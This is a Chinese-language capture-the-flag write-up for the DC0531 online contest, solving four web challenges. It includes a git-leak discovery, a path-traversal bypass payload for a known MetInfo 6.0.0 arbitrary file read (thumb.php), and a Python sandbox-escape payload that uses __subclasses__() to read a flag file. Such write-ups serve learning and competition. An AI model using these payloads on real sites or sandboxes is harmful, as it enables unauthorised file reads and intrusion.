DC0531 CTF 线上赛 #### Web1 先关注公众号然后发现是个游戏。 测试发现`s:ip`这样会向我们的vps发送ping请求 通过ping请求得到服务器ip,扫描得知存在git泄露 ![](https://i.imgur.com/nTZcwBb.png) 通过分析可知,将武器切换为flag即可 ![](https://i.imgur.com/TSStv2q.png) 然后一直s我们的vps ![](https://i.imgur.com/LqbdUW8.png) ![](https://i.imgur.com/GOOmZkQ.png) 得到base64加密的flag.php文件 `PD9WaHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg` 解密即可 #### Web2 题目存在git泄露 `http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/` 根据网上纰漏的文件读取,然后进行bypass得到flag `/include/thumb.php?dir=.....///./http/.....///./.....///./.....///./.....///./flag` ![](https://i.imgur.com/svlFgJf.png) #### Web3 首先输入 `().__class__.__base__.__subclasses__()`不可用 `0x1.__class__.__base__.__subclasses__()`发现可用 ![](https://i.imgur.com/65uNpT0.png) `0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")` 可以读到文件流 但是不能直接 read,通过 for 循环将文件内容读取出来,这里注意不允许有空格 `[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]` ![](https://i.imgur.com/PEVudH7.png) #### Web4 原题 https://github.com/wonderkun/CTF_web/tree/dcf36cb9ba9a580a4e8d92b43480b6575fed2c3a/web200-7